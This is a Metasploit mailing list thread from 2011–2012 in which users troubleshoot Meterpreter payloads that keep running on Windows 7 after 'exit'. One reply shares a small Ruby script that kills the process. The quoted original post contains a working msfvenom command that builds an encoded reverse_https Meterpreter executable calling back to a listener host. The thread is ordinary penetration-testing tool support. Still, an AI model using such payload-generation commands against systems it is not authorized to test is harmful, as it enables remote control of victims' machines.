Metasploit mailing list archives

Re: meterpreter exit problem..


From: Jason Hawks <jason.hawks0 () gmail com>
Date: Fri, 24 Feb 2012 10:00:23 +0100

Hi,

It seems that SessionCommunicationTimeout and SessionExpirationTimeout have
no effect either. The EXE is still running even after the given timeouts.

As a dirty workaround, I use a tiny post script to "kill" the process.

file:

scripts/meterpreter/killme.rb

content:

print_status(".. Killing Meterpreter process")
pid = session.sys.process.getpid()
session.sys.process.kill(pid)


Usage:

meterpreter > run killme
[*] .. Killing Meterpreter process
====> Since the communication is broken, Hit CTRL-C, then detach the console
meterpreter > detach


(ps: http://dev.metasploit.com/redmine/issues/5945)

Jason


2011/12/3 Drforbin <drforbin6 () gmail com>

Hi all,

   I'm having the same problem as in Jason Hawks' posting (see quote).
I have tried setting multi/handler to process etc.; nothing seems to work.
As Jason points out, and I have confirmed, everything works fine on Windows XP;
it is Windows 7 which gives some problems.


Please help if anyone can..


Thanks

Merlyn

drforbin





"
Hello everyone,

I have an issue with the "Exit" command during a meterpreter session.
The payload (EXE) doesn't exit on the victim computer.

- On Windows 7 (x86/x64), I have tested reverse_https, reverse_tcp and
bind_tcp with exitfunc=process/thread/seh. None of these payloads
exit. I must kill them manually.
- On Windows XP, only reverse_https has the issue.

I generate the payloads by using the following syntax:

./msfvenom -e x86/shikata_ga_nai -f exe -p
windows/meterpreter/reverse_https LHOST=192.168.1.103 LPORT=443
EXITFUNC=XXXX > /tmp/reverse_https_192.168.1.103_443_exitfunc_XXXX.exe


Current MSF version:
      =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 757 exploits - 402 auxiliary - 114 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
      =[ svn r14193 updated today (2011.11.08)

$ ruby -v
ruby 1.9.2p290 (2011-07-09 revision 32553) [i686-linux]

Am I doing something wrong?
Any advice/workaround is welcome.

Thank you very much,

Jason

"

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
